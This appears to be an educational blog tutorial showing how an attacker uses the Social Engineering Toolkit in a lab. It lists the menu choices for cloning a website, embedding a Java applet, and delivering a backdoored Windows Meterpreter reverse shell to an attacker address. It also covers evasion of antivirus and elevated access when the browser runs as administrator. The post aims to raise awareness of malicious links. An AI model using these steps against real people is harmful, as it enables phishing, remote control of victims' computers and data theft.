As with all of my other tutorial hacking posts, this one is purely educational. This post is designed to increase awareness of malicious links by showing you exactly how a hacker might execute a browser based attack.
When I explain hacking, I like to divide attacks into two categories. Service based attacks and client based attacks. To figure out what category the attack falls into, answer the question, “Who initiated the malicious chain of events, the good guy or bad guy?” If the bad guy initiated the malicious chain of events, for example, brute force the SQL Server ‘sa’ account, then that is a service based attack. If the good guy initiates the mayhem, for example, clicks a malicious link, then this is a client based attack.
This breakdown of all hacks makes perfect sense to telecom professionals. This is because of firewall rules. A firewall rule requires a direction, in or out. Service based attacks come from outside the network in, and client based attacks come from inside the network going out. Windows firewall by default allows outbound connections, thus we have a problem. Clients are allowed to click whatever filthy, stinking, grimey links they want. Lets get started on how an attacker might set up that trap (pun totally intended).
First, I recommend getting VMware player and downloading backtrack vm. Used the bridged option in vm networking settings for this test. Once logged in, use the menu to navigate to SET – the Social Engineering Toolkit.
Once SET is loaded up it’s simply a series of options you need to select to lay the trap. This trap is going to be a web server with a page cloned from a valid website. The page is going to have java code embedded that the user will probably have to approve to run. These are the options I have selected:
1 social engineering attack
2 website attack vector
1 java applet attack method
2 site cloner
no we’re not NAT’n
enter ip of backtrack 10.10.10.107
2 Windows reverse_TCP Meterpreter
16 Backdoored Executable
port:enter for default
wait for “starting payload handler…” which means its ready! :]
Now go to your host machine that probably has java installed and use one of many modern browsers and enter the ip http://10.10.10.107
You should see all kinds of warnings that Google and Microsoft have put in to protect you. Unfortunately, these are generally ignored. Especially if the attacker has peaked the user’s curiosity. Once you have approved all the warnings, go back to your backtrack vm. You should see some activity and, if you are lucky, an open session.
What this attack has done is run malicious code, my awesome virus scan picks up on that but before I can click remove, the code has launched powershell.exe and injected itself into that process and fooled the virus scan. At least the pop-up will alert the user bad stuff is about to or has already happened.
The backdoor makes an outbound HTTPS connection to the attacker’s machine to allow meterpreter to then do it’s dirty work. You can see this connection if you run netstat on the victim
TCP 10.10.10.100:2754 10.10.10.107:https ESTABLISHED
The normal browser context is limited by UAC. If you run the browser as administrator, the malicious code runs as system and can migrate to other, very privileged processes.
I hope this lesson helps you avoid malicious links. Keep in mind, bad guys can do a lot of bad things to your computer, even take a picture of you. So make sure to smile when clicking sketchy links!